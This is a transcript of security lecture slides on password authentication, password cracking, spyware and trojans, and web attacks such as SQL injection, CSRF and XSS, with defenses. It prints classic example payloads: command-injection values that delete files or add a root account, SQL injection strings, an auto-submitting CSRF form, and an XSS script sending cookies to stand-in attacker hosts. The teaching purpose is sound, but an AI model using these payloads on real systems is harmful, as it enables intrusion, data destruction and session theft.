1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to...
Transcript of 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to...
![Page 1: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/1.jpg)
1. PASSWORD ATTACK
2. APPLICATION ATTACK
![Page 2: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/2.jpg)
References:
1. Bruce Schneier, Applied Cryptography
2. CEH v7 Tutorial
21/03/2017
2
![Page 3: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/3.jpg)
Authentication
Authentication using One-Way Functions
Authentication using Public-Key Cryptography
Attack
21/03/2017 3
![Page 4: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/4.jpg)
Authentication
21/03/2017 4
![Page 5: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/5.jpg)
When Alice logs into a host computer, how does the host know who she is?
How does the host know she is not Eve trying to falsify Alice’s identity?
Traditionally, passwords solve this problem.
Both Alice and the host know this secret piece of knowledge and the hostrequests it from Alice every time she tries to log in.
21/03/2017 5
![Page 6: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/6.jpg)
Authentication using
One-Way Functions
21/03/2017 6
![Page 7: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/7.jpg)
The host does not need to know the passwords.
The host just has to be able to differentiate valid passwords from invalidpasswords. This is easy with one-way functions.
Instead of storing passwords, the host stores one-way functions of thepasswords.
21/03/2017 7
![Page 8: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/8.jpg)
1. Alice sends the host her password.
2. The host performs a one-way function on the password.
3. The host compares the result of the one-way function to the value itpreviously stored.
21/03/2017 8
![Page 9: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/9.jpg)
Since the host no longer stores a table of everybody’s valid password, thethreat of someone breaking into the host and stealing the password list ismitigated.
The list of passwords operated on by the one-way function is useless, becausethe one-way function cannot be reversed to recover the passwords.
21/03/2017 9
![Page 10: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/10.jpg)
Authentication using
Public-Key Cryptography
21/03/2017 10
![Page 11: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/11.jpg)
PROBLEM :
When Alice sends her password to her host, anyone who has access to herdata path can read it.
Eve can be at any one of those points, listening to Alice’s login sequence. IfEve has access to the processor memory of the host, she can see thepassword before the host hashes it.
21/03/2017 11
![Page 12: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/12.jpg)
Public-key cryptography can solve this
problem.
The hostkeeps a file of every user’s public key.
All userskeep their
own private keys. 21/03/2017 12
![Page 13: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/13.jpg)
• The host sends Alice a randomstring.
• Alice encrypts the string with herprivate key and sends it back to thehost, along with her name.
• The host looks up Alice’s public keyin its database and decrypts themessage using that public key.
• If the decrypted string matches whatthe host sent Alice in the first place,the host allows Alice access to thesystem.
When logging in, the
protocol proceeds
as follows:
21/03/2017 13
![Page 14: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/14.jpg)
Secure proof-of-identity protocols take thefollowing form:
• Alice performs a computation based on some random numbers and her private key and sends the result to the host.
• The host sends Alice a different random number.
• Alice makes some computation based on the random numbers (both the ones she generated and the one she received from the host) and her private key, and sends the result to the host.
• The host does some computation on the various numbers received from Alice and her public key to verify that she knows her private key.
• If she does, her identity is verified. 21/03/2017 14
![Page 15: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/15.jpg)
If Alice does not trust the host any more than the host trusts Alice, then Alicewill require the host to prove its identity in the same manner.
Step (1) might seem unnecessary and confusing, but it is required to preventattacks against the protocol.
21/03/2017 15
![Page 16: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/16.jpg)
21/03/2017 16
![Page 17: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/17.jpg)
(a) Dictionary attack
(b) Brute force Attack
(c) Hybrid Attack
(d) Syllable Attack
(e) Rule-based Attack
21/03/2017 17
Password Cracking Techniques
(a) Based on familiar password
(b) tries every combination of character
(c) Like dictionary attack, but adds some number and symbol
(d) Combination brute force attack and dictionary attack
(e) Used when the attacker gets some information about
password
![Page 18: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/18.jpg)
21/03/2017 18
![Page 19: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/19.jpg)
21/03/2017 19
Keylogger is a
program that runs in
the background and
allow remote
attackers to record
every keystroke
Trojan enabling
attackers to gets
access to the stored
password in the
attacked computer
Spyware is a type of
malware that allows
attackers to get secret key
gather information about
person or organization
![Page 20: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/20.jpg)
21/03/2017 20
![Page 21: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/21.jpg)
What does spyware do?
Steals user’s personal information and send it to remote server
Monitor user’s online activity
Display annoying pop up and redirect browser to advertising site
Decrease overall system security level
Connects to remote pornography sites
Reduce systems performance and causes software instability
21/03/2017 21
![Page 22: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/22.jpg)
Purpose of Trojan:
Steal information such as password, security codes, credit card information, using keylogger
Delete or replace OS system critical file
Generate fake traffic to create DoS attack
Disable firewall and antivirus
Use victim’s PC for spamming
Use victim’s PC as a botnet
21/03/2017 22
![Page 23: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/23.jpg)
21/03/2017 23
![Page 24: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/24.jpg)
Default password is a password supplies by the manufacturer with new equipment that is password protected
Ex:
www.defaultpassword.com
21/03/2017 24
![Page 25: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/25.jpg)
Windows stores user password in the Security Acccount Manager (SAM) not clear text, but hashed.
21/03/2017 25
![Page 26: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/26.jpg)
References:
1. Network Security. John Mitchell. Standford University
2. CEH v7 Tutorial
21/03/2017
26
![Page 27: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/27.jpg)
![Page 28: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/28.jpg)
Web Attacker
Sets up malicious
site visited by
victim; no control
of network
Alice
System
Web security threat model
![Page 29: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/29.jpg)
Network Attacker
Intercepts and
controls network
communication
Alice
System
Network security threat model
![Page 30: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/30.jpg)
Web Attacker
Alice
System
Network Attacker
Alice
System
![Page 31: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/31.jpg)
SQL Injection
Browser sends malicious input to server
Bad input checking fails to block malicious SQL
CSRF – Cross-site request forgery
Bad web site sends browser request to good web site, using credentials of an innocent victim
XSS – Cross-site scripting
Bad web site sends innocent victim a script that steals information from an honest web site
![Page 32: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/32.jpg)
SQL Injection
Browser sends malicious input to server
Bad input checking leads to malicious SQL query
CSRF – Cross-site request forgery
Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site
XSS – Cross-site scripting
Bad web site sends innocent victim a script that steals information from an honest web site
Inject malicious script into
trusted context
Leverage user’s session at
victim sever
Uses SQL to change meaning of
database command
![Page 33: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/33.jpg)
Background for SQL Injection
![Page 34: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/34.jpg)
Attack goal: execute arbitrary code on the server
Examplecode injection based on eval (PHP)
http://site.com/calc.php (server side calculator)
Attackhttp://site.com/calc.php?exp=“ 10 ; system(‘rm *.*’) ”
(URL encoded)
…
$in = $_GET[‘exp'];
eval('$ans = ' . $in . ';');
…
![Page 35: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/35.jpg)
Example: PHP server-side code for sending email
Attacker can post
OR
$email = $_POST[“email”]
$subject = $_POST[“subject”]
system(“mail $email –s $subject < /tmp/joinmynetwork”)
http://yourdomain.com/mail.php?
subject=foo < /usr/passwd; ls
http://yourdomain.com/mail.php?
[email protected]&subject=foo;
echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
![Page 36: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/36.jpg)
![Page 37: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/37.jpg)
Sample PHP
ProblemWhat if ‘recipient’ is malicious string that changes the meaning of the query?
(the wrong way)
$recipient = $_POST[‘recipient’];
$sql = "SELECT PersonID FROM Person WHERE
Username='$recipient'";
$rs = $db->executeQuery($sql);
![Page 38: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/38.jpg)
38
Victim Server
Victim SQL DB
Attacker
unintended
SQL queryreceive valuable data
1
2
3
![Page 39: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/39.jpg)
39
CardSystems
credit card payment processing company
SQL injection attack in June 2005
put out of business
The Attack
263,000 credit card #s stolen from database
credit card #s stored unencrypted
43 million credit card #s exposed
![Page 40: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/40.jpg)
WordPress SEO plugin by Yoast, March 2015
“The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities.
“The authenticated Blind SQL Injection vulnerability can be found within the ‘admin/class-bulk-editor-list-table.php’ file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query.
https://wpvulndb.com/vulnerabilities/7841
![Page 41: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/41.jpg)
41
set ok = execute( "SELECT * FROM Users
WHERE user=' " & form(“user”) & " '
AND pwd=' " & form(“pwd”) & “ '” );
if not ok.EOF
login success
else fail;
Is this exploitable?
![Page 42: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/42.jpg)
Web
Server
Web
Browser
(Client)DB
Enter
Username
&
Password
SELECT *
FROM Users
WHERE user='me'
AND pwd='1234'
Normal Query
![Page 43: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/43.jpg)
43
Suppose user = “ ' or 1=1 -- ” (URL encoded)
Then scripts does:ok = execute( SELECT …
WHERE user= ' ' or 1=1 -- … )
The “--” causes rest of line to be ignored.
Now ok.EOF is always false and login succeeds.
The bad news: easy login to many sites this way.
![Page 44: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/44.jpg)
44
Suppose user =
“ ′ ; DROP TABLE Users -- ”
Then script does:
ok = execute( SELECT …
WHERE user= ′ ′ ; DROP TABLE Users … )
Deletes user table
Similarly: attacker can add users, reset pwds, etc.
![Page 45: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/45.jpg)
45
Suppose user =
′ ; exec cmdshell
′net user badguy badpwd′ / ADD --
Then script does:ok = execute( SELECT …
WHERE username= ′ ′ ; exec … )
If SQL server context runs as “sa”, attacker gets account on DB server
![Page 46: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/46.jpg)
46
0x 5c \
0x bf 27 ¿′
0x bf 5c
PHP: addslashes( “ ’ or 1 = 1 -- ”)
outputs: “ \’ or 1=1 -- ”
Unicode attack: (GBK)
$user = 0x bf 27
addslashes ($user) 0x bf 5c 27
Correct implementation: mysql_real_escape_string()
′
![Page 47: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/47.jpg)
Never build SQL commands yourself !
Use parameterized/prepared SQL
Use ORM framework
![Page 48: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/48.jpg)
48
Builds SQL queries by properly escaping args: ′ \′
Example: Parameterized SQL: (ASP.NET 1.1)
Ensures SQL arguments are properly escaped.
SqlCommand cmd = new SqlCommand(
"SELECT * FROM UserTable WHERE
username = @User AND
password = @Pwd", dbConnection);
cmd.Parameters.Add("@User", Request[“user”] );
cmd.Parameters.Add("@Pwd", Request[“pwd”] );
cmd.ExecuteReader();
In PHP: bound parameters -- similar function
![Page 49: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/49.jpg)
![Page 50: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/50.jpg)
ServerBrowser
![Page 51: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/51.jpg)
51
Attack Server
Server Victim
User Victim
1
2
4
Q: how long do you stay logged in to Gmail? Facebook? ….
![Page 52: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/52.jpg)
Example:
User logs in to bank.com
Session cookie remains in browser state
User visits another site containing:
<form name=F action=http://bank.com/BillPay.php>
<input name=recipient value=badguy> …
<script> document.F.submit(); </script>
Browser sends user auth cookie with request
Transaction will be fulfilled
Problem:
cookie auth is insufficient when side effects occur
![Page 53: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/53.jpg)
User credentials
Cookie: SessionID=523FA4cd2E
![Page 54: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/54.jpg)
54
Bad web site
Home router
User
1
2
3
4
![Page 55: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/55.jpg)
Fact:
50% of home users have broadband router with a default or no password
Drive-by Pharming attack: User visits malicious site JavaScript at site scans home network looking for broadband router:
• SOP allows “send only” messages
• Detect success using onerror:
<IMG SRC=192.168.0.1 onError = do() >
Once found, login to router and change DNS server
Problem: “send-only” access sufficient to reprogram router
[SRJ’07]
![Page 56: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/56.jpg)
![Page 57: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/57.jpg)
![Page 58: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/58.jpg)
![Page 59: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/59.jpg)
![Page 60: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/60.jpg)
![Page 61: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/61.jpg)
![Page 62: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/62.jpg)
referer: http://www.site.com
referer: http://www.site.com
What if honest site sends POST to attacker.com?
Solution: origin header records redirect
![Page 63: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/63.jpg)
Login CSRF Strict Referer/Origin header validation
Login forms typically submit over HTTPS, not blocked
HTTPS sites, such as banking sites Use strict Referer/Origin validation to prevent CSRF
Other Use Ruby-on-Rails or other framework that
implements secret token method correctly
Origin header Alternative to Referer with fewer privacy problems
Sent only on POST, sends only necessary data
Defense against redirect-based attacks
![Page 64: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/64.jpg)
![Page 65: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/65.jpg)
Attack Server
Victim Server
Victim client
1
2
5
![Page 66: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/66.jpg)
search field on victim.com:
http://victim.com/search.php ? term = apple
Server-side implementation of search.php:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET[term] ?> :
. . .
</BODY> </HTML>
echo search term
into response
![Page 67: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/67.jpg)
Consider link: (properly URL encoded)
http://victim.com/search.php ? term =
<script> window.open(
“http://badguy.com?cookie = ” +
document.cookie ) </script>
What if user clicks on this link?
1. Browser goes to victim.com/search.php
2. Victim.com returns
<HTML> Results for <script> … </script>
3. Browser executes script:
Sends badguy.com cookie for victim.com
![Page 68: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/68.jpg)
<html>
Results for
<script>
window.open(http://attacker.com?
... document.cookie ...)
</script>
</html>
Attack Server
Victim Server
Victim client
http://victim.com/search.php ?
term = <script> ... </script>
www.victim.com
www.attacker.com
![Page 69: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/69.jpg)
An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application
Methods for injecting malicious code:Reflected XSS (“type 1”) the attack script is reflected back to the user as part of a page from the
victim site
Stored XSS (“type 2”) the attacker stores the malicious code in a resource managed by the web
application, such as a database
Others, such as DOM-based attacks
![Page 70: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/70.jpg)
Attack Server
Server Victim
User Victim
1
2
5
Email version
![Page 71: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/71.jpg)
Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website.
Injected code redirected PayPal visitors to a page warning users their accounts had been compromised.
Victims were then redirected to a phishing site and prompted to enter sensitive financial data.
Source: http://www.acunetix.com/news/paypal.htm
![Page 72: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/72.jpg)
SQL Injection Bad input checking allows malicious SQL query
Known defenses address problem effectively
CSRF – Cross-site request forgery Forged request leveraging ongoing session
Can be prevented (if XSS problems fixed)
XSS – Cross-site scripting Problem stems from echoing untrusted input
Difficult to prevent; requires care, testing, tools, …
Other server vulnerabilities Increasing knowledge embedded in frameworks, tools, application development
recommendations
![Page 73: 1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way](https://reader036.fdocuments.us/reader036/viewer/2022070914/5fb53e9e4dbc8b4a4c7c57d7/html5/thumbnails/73.jpg)
Ref
